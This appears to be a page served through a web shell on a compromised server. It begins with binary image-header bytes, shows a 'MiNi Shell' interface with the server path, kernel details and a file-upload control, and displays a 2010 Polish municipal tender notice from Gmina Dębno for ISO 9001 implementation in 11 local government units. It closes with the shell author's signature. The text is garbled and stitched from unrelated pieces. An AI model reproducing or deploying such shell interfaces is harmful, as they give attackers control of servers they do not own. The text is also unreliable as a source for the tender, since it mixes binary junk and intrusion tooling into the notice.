JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100107/5128-N-2010.html

<p class="kh_header"><b>Dębno: WDROŻENIE SYSTEMU ZARZĄDZANIA JAKOŚCIĄ ZGODNEGO Z ISO 9001 W 11 JEDNOSTKACH SAMORZĄDU TERYTORIALNEGO (JST)</b><br>
<b>Numer ogłoszenia: 5128 - 2010; data zamieszczenia: 07.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dębno , ul. Marszałka J. Piłsudskiego 5, 74-400 Dębno, woj. zachodniopomorskie, tel. 095 7603001 do 4, faks 095 7602030.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.debno.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WDROŻENIE SYSTEMU ZARZĄDZANIA JAKOŚCIĄ ZGODNEGO Z ISO 9001 W 11 JEDNOSTKACH SAMORZĄDU TERYTORIALNEGO (JST).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje wdrożenie Systemu Zarządzania Jakością zgodnego z ISO 9001:2009 w jedenastu jednostkach samorządu terytorialnego, obejmujące usługę doradczą oraz usługę szkoleniową w ramach projektu /Krok w przyszłość - od biurokratycznej irracjonalności do kompleksowego zarządzania jakością/ współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki 2007-2013, Działanie 5.2. Modernizacja zarządzania w administracji publicznej, Podziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej):

I. Wykonanie usługi doradczej w 11 JST w wymiarze 232 godzin przypadających na JST, tj. razem 2552 godziny doradztwa w zakresie wdrożenia Systemu Zarządzania Jakością (SZJ) zgodnego z ISO 9001:
Usługa doradcza obejmuje:
1. Diagnozę organizacji (analizę organizacji) pod kątem spełniania wymagań PN EN ISO 9001:2009 oraz przepisów prawnych i innych obowiązujących w Urzędzie (istniejące standardy postępowania, realizacja przepisów ogólnych, organizacja Urzędu),
2. Ustalenie zakresu systemu ISO 9001, wytycznych dla polityki jakości, modelu podejścia procesowego, struktury dokumentacji (księga jakości, procedury, instrukcje, formularze i inne niezbędne dokumenty) oraz metodyki wdrożenia,
3. Opracowanie i ustalenie harmonogramu wdrożenia z uwzględnieniem koniecznych szkoleń (w ramach usługi doradczej) - szkolenia dla kierownictwa Urzędu oraz kaskadowego szkolenia pracowników w zakresie opracowanego systemu zarządzania,
4. Pomoc doradcza w zakresie opracowania dokumentacji systemowej - polityki jakości i celów, księgi jakości, procedur wymaganych normą oraz standardów realizowanych procesów (sposoby postępowania) wraz z koniecznymi instrukcjami i formularzami (udział czynny konsultantów),
5. Wsparcie doradcze w wyborze członków grup roboczych (zespołów wdrożeniowych), pełnomocników oraz audytorów wewnętrznych,
6. Zaplanowanie wraz z powołanymi przedstawicielami kierownictwa auditów wewnętrznych oraz przeprowadzenie wspólne z powołanymi i przeszkolonymi audytorami wewnętrznymi pierwszej serii auditów wewnętrznych (udział konsultantów w auditach wewnętrznych) oraz wspólne opracowanie wzorcowych raportów z auditów,
7. Pomoc doradcza w zaplanowaniu działań korekcyjnych, korygujących i zapobiegawczych po pierwszej serii auditów wewnętrznych,
8. Doradztwo w zakresie działań korygujących,
9. Przygotowanie i udział w pierwszym przeglądzie zarządzania,
10. Pomoc w wyborze jednostki certyfikującej oraz udział w audicie certyfikującym (oba etapy),
11. Doradztwo w zakresie poauditowych działań korygujących.
II. Wykonanie usługi szkoleniowej w wymiarze 256 godzin w zakresie tematyki Systemu Zarządzania Jakością (SZJ) zgodnego z ISO 9001:2009 dla 4 grup JST (razem 11 JST):
Szkolenie w wymiarze 32 dni w zakresie jak niżej:
Obligatoryjnie:
1. Szkolenie dla kadry kierowniczej i pełnomocników ISO w JST objętych wdrożeniem (16 godz. x 4 grupy) - opracowany plan szkolenia wraz z celem i efektem szkolenia (słuchacze otrzymują materiał szkoleniowy oraz zaświadczenia),
2. Szkolenia dla zespołów wdrożeniowych JST objętych wdrażaniem (24 godz. x 4 grupy) opracowany plan szkolenia wraz z celem i efektem szkolenia (słuchacze otrzymują materiał szkoleniowy oraz zaświadczenia),
3. Szkolenie dla auditorów wewnętrznych - szkolenie 4 dniowe (24 godz. x 4 grupy) dla grupy szkoleniowej max. 20 osobowej, teoria i ćwiczenia w proporcji 50:50, opracowany plan szkolenia wraz z celem i efektem szkolenia (słuchacze otrzymują materiał szkoleniowy oraz zaświadczenia),
4. Obowiązkowa tematyka dla wszystkich szkoleń - wykorzystanie metod i narzędzi systemu zarządzania jakością w doskonaleniu systemu zarządzania jakością - opracowany plan szkolenia wraz z celem i efektem szkolenia (słuchacze otrzymują materiał szkoleniowy oraz zaświadczenia).
III. Jednostki Samorządu Terytorialnego objęte wdrożeniem SZJ zgodnego z ISO 9001 będącego przedmiotem niniejszego zamówienia:
1. Gmina Dębno - Urząd Miejski w Dębnie, 74-400 Dębno ul. Piłsudskiego 5.
2. Gmina Myślibórz - Urząd Miasta i Gminy Myślibórz, 74-300 Myślibórz ul. Rynek im. Jana Pawła II 1.
3. Gmina Boleszkowice - Urząd Gminy w Boleszkowicach, 74-407 Boleszkowice 
ul. Świerczewskiego 24. 
4. Gmina Bierzwnik - Urząd Gminy w Bierzwniku, 73-240 Bierzwnik ul. Kopernika 2.
5. Gmina Lubiszyn - Urząd Gminy Lubiszyn, 66-433 Lubiszyn, pl. Jedności Robotniczej 1.
6. Gmina Barlinek Urząd Miasta w Barlinku, 74-320 Balinek ul. Niepodległości 20. 
7. Gmina Warnice - Urząd Miasta w Warnicach, 74-201 Warnice 66. 
8. Gmina Choszczno - Urząd Miasta w Choszcznie, 73-200 Choszczno ul. Wolności 24.
9. Gmina Nowogródek Pomorski - Urząd Gminy w Nowogródku Pomorskim, 74-304 Nowogródek Pomorski ul. A. Mickiewicza 15. 
10. Gmina Krzęcin - Urząd Gminy w Krzęcinie, 72-231 Krzęcin ul. Tylna 7. 
11. Powiat Myślibórz - Starostwo Powiatowe w Myśliborzu, 74-300 Myślibórz
ul. Marcinkowskiego 2..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.41.00.00-1, 79.63.20.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu jest wniesienie wadium w wysokości 8.500,-zł. do dnia 21.01.2010r. do godz.09:00<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wyłącznie Wykonawcy, którzy spełniają określone przez Zamawiającego warunki tj.:
1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek posiadania takich uprawnień,
2. Posiadają wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia:
2.1. Niezbędne wymagania dotyczące doświadczenia Wykonawcy:  
a) wykonanie co najmniej 3 skutecznych (tj. potwierdzonych zdobyciem przez daną jednostkę certyfikatu) wdrożeń systemu zarządzania jakością zgodnego 
z ISO 9001 w jednostkach samorządu terytorialnego w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie,
b) organizacja i przeprowadzenie minimum 3 szkoleń z zakresu wymagań normy ISO 9001 poświadczone dokumentem potwierdzającym należyte wykonanie usługi (referencjami) w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie. 
2.2. Wymagania dotyczące kadry merytorycznej uczestniczącej w realizacji zamówienia:  
2.2.1. Wykonawca zapewni lub przedstawi zobowiązania podmiotu trzeciego do udostępnienia na potrzeby wykonania zadania nie mniej niż 11 osób personelu wdrożeniowego (min. 11 konsultantów tj. 1 konsultant na JST), spełniających następujące wymagania:
1) posiadanie wiedzy merytorycznej przez wszystkich konsultantów w zakresie wymagań normy ISO 9001 potwierdzone certyfikatem audytora wiodącego (Lead auditor) oraz udokumentowane uczestnictwo w skutecznym, to jest potwierdzonym uzyskaniem przez jednostkę certyfikatu, wdrożeniu SZJ zgodnego z wymaganiami normy ISO 9001, w co najmniej 3 jednostkach samorządu terytorialnego.
2.2.2. Wykonawca zapewni lub przedstawi zobowiązania podmiotu trzeciego do udostępnienia na potrzeby wykonania zadania nie mniej niż 4 osoby personelu szkoleniowego (min. 4 trenerów), spełniających następujące wymagania:
1) każdy trener/zespół trenerów winien legitymować się doświadczeniem w postaci przeprowadzenia min. 9 szkoleń z zakresu normy ISO 9001, w tym:
a) co najmniej 3 szkoleń dla auditorów wewnętrznych, 
b) co najmniej 3 szkoleń dla pełnomocników ISO,
c) co najmniej 3 szkoleń dla zespołów wdrożeniowych,
poświadczonych dokumentami potwierdzającymi należyte wykonanie usług (referencjami). 
Wykonawca może zapewnić na potrzeby wykonania zamówienia 4 trenerów (jeden trener na grupę JST), który spełni jednocześnie wymagania opisane w punkcie a-c lub zapewnić zespół trenerów (2-3 trenerów na grupę JST), który łącznie spełni powyższe wymagania.
Osoby, które będą pełnić funkcje konsultantów przy wdrażaniu normy ISO 9001 mogą jednocześnie pełnić funkcję trenerów, o ile spełnią wymagania opisane w podpunkcie 2.2.2 ust. 1).
3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą spełnia/nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wymienionych w pkt. 9 Specyfikacji Istotnych Warunków Zamówienia. Z treści załączonych dokumentów musi jednoznacznie wynikać, że w/w warunki Wykonawca spełnił.

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunki określone w pkt 1-2 winien spełniać jeden Wykonawca lub Wykonawcy wspólnie, warunek określony w pkt 3-4 winni spełniać wszyscy Wykonawcy.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1 W celu potwierdzenia spełniania warunków stawianych Wykonawcom przez Zamawiającego oraz dla uznania formalnej poprawności oferta musi zawierać następujące dokumenty i oświadczenia: 
1) formularz ofertowy (załącznik nr 1),
2) pełnomocnictwo określające jego zakres w przypadku, gdy Wykonawcę reprezentuje pełnomocnik,
3) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
4) oświadczenie Wykonawcy o nie zaleganiu z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne (załącznik nr 4),
5) polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na kwotę nie mniejszą niż 400 000,00 zł. W przypadku złożenia oferty wspólnej warunek ten nie podlega łączeniu tj. winna go spełnić w całości przynajmniej jedna z firm,
6) dowód wniesienia wadium,
7) oświadczenie o spełnieniu warunków określonych w art. 22 ust.1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (załącznik nr 2),
8) oświadczenie o nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (załącznik nr 3),
9) wykaz wykonanych przez Wykonawcę co najmniej 3 skutecznych (tj. potwierdzonych zdobyciem przez jednostkę certyfikatu) wdrożeń SZJ zgodnego z ISO 9001 w Jednostkach Samorządu Terytorialnego w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeśli okres prowadzenia jest krótszy - w tym okresie. Wykaz winien zawierać ilość jednostek, w których zostało przeprowadzone wdrożenie SZJ zgodnego z ISO 9001, nazwę zamawiającego, termin realizacji, a także jego wartość. Do wykazu należy załączyć dokumenty (referencje) potwierdzające, że wszystkie wyszczególnione usługi zostały wykonane należycie - w szczególności z dokumentów tych winno wynikać, iż wdrożenie systemu było skuteczne tj. podmiot zewnętrzny uzyskał certyfikat SZJ wg normy ISO 9001 (załącznik nr 5),
10) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz 
z informacjami na temat ich wykształcenia, kwalifikacji zawodowych, doświadczenia niezbędnego do wykonania zamówienia. W szczególności z podanych informacji musi wynikać spełnienie wymagań opisanych w pkt 8 ppkt 2. Osoby fizyczne nie pozostające w stosunku pracy z oferentem traktowane będą jako podmioty trzecie, w związku z czym Wykonawca musi przedstawić pisemne zobowiązanie do uczestnictwa w projekcie każdej z tych osób, ze wskazaniem funkcji pełnionej w projekcie. 
Do wykazu należy załączyć dokumenty (referencje) potwierdzające, że wszystkie wyszczególnione usługi zostały wykonane należycie oraz dokumenty potwierdzające posiadane kwalifikacje (załącznik nr 6),
11) harmonogram usług doradczych i szkoleniowych (załącznik nr 7),
12) wykaz przeprowadzonych przez Wykonawcę szkoleń z zakresu wymagań normy ISO 9001 oraz poświadczone za zgodność z oryginałem kserokopie dokumentów (referencji) potwierdzających należyte wykonanie usług (załącznik nr 8).

W przypadku wnoszenia oferty wspólnej przez dwa podmioty lub więcej podmiotów gospodarczych żaden z nich nie może podlegać wykluczeniu z postępowania na podstawie art. 24 Ustawy Pzp - każdy z podmiotów występujących wspólnie musi złożyć oświadczenie potwierdzające spełnienie warunków udziału w postępowaniu (załącznik nr 3) oraz oświadczenie potwierdzające, iż podmiot znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Oferta złożona przez podmioty występujące wspólnie musi zawierać pełnomocnictwo dla podmiotu reprezentującego wszystkie podmioty występujące wspólnie. 
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, przedstawia dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. 
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa powyżej zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. 

Dokumenty należy złożyć w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.debno.com.pl/zamowienia.dhtml.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dębnie, ul. J. Piłsudskiego 5, 74-400 Dębno.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.01.2010 godzina 09:50, miejsce: Urząd Miejski w Dębnie, ul. J. Piłsudskiego 5, 74-400 Dębno - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com